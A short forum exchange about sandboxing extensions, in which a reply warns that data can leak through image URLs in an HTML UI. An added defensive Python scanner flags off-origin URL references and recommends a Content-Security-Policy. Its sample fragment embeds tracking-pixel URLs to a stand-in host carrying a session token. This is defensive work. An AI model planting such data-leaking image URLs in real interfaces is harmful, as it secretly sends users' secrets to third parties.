- Give extensions the ability to do whatever they want (in the sense of not requiring them to only call your specific API signatures), but run them in a sandbox, so that they have to ask for access to the internet, filesystem, and so on?
Certainly not the worst approach, but it might turn out far less watertight than hoped. E.g. plenty of places in html-based UI where you can sneak in a URL that pulls some image, with all the data sent upstream you can fit in a GET. And good luck noticing, when everything is on https and someone decided that certificates should be pinned.
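One defender-side check for the image-URL leak the reply describes, added here as an example (not code from the thread): it scans an extension-supplied HTML fragment and flags every src/href/srcset/style url() reference whose host is outside an allow-list. The hostnames and the sample fragment are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes through which an HTML fragment can make the browser fetch a URL
URL_ATTRS = {"src", "href", "srcset", "poster", "data", "action", "background"}
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")]+)")

class OffOriginScanner(HTMLParser):
    """Collect (tag, attribute, url) for every reference to a host outside the allow-list."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []

    def _check(self, tag, attr, url):
        # Relative paths and data: URIs have no host and cannot reach the network
        host = urlparse(url.strip()).hostname
        if host and host.lower() not in self.allowed:
            self.findings.append((tag, attr, url.strip()))

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            if name in URL_ATTRS:
                # srcset carries comma-separated "url [descriptor]" candidates
                for cand in value.split(","):
                    parts = cand.split()
                    if parts:
                        self._check(tag, name, parts[0])
            elif name == "style":
                # Inline CSS can fetch too: background: url(...)
                for u in CSS_URL.findall(value):
                    self._check(tag, "style", u)

def scan_fragment(html, allowed_hosts):
    """Return off-origin references found in an extension-supplied HTML fragment."""
    scanner = OffOriginScanner(allowed_hosts)
    scanner.feed(html)
    return scanner.findings

# Constructed sample: a benign local icon plus two exfiltration-style references
SAMPLE = """<div>
  <img src="/static/icon.png" alt="ok">
  <img src="https://collector.example/p.gif?d=session-token" width="1" height="1">
  <span style="background: url(//collector.example/bg.png?x=more-data)"></span>
</div>"""
```

A scanner like this is a review aid; in a deployed UI the same rule belongs in a Content-Security-Policy (e.g. `img-src 'self'` plus the allowed hosts) so the browser refuses the fetch instead of anyone having to notice it.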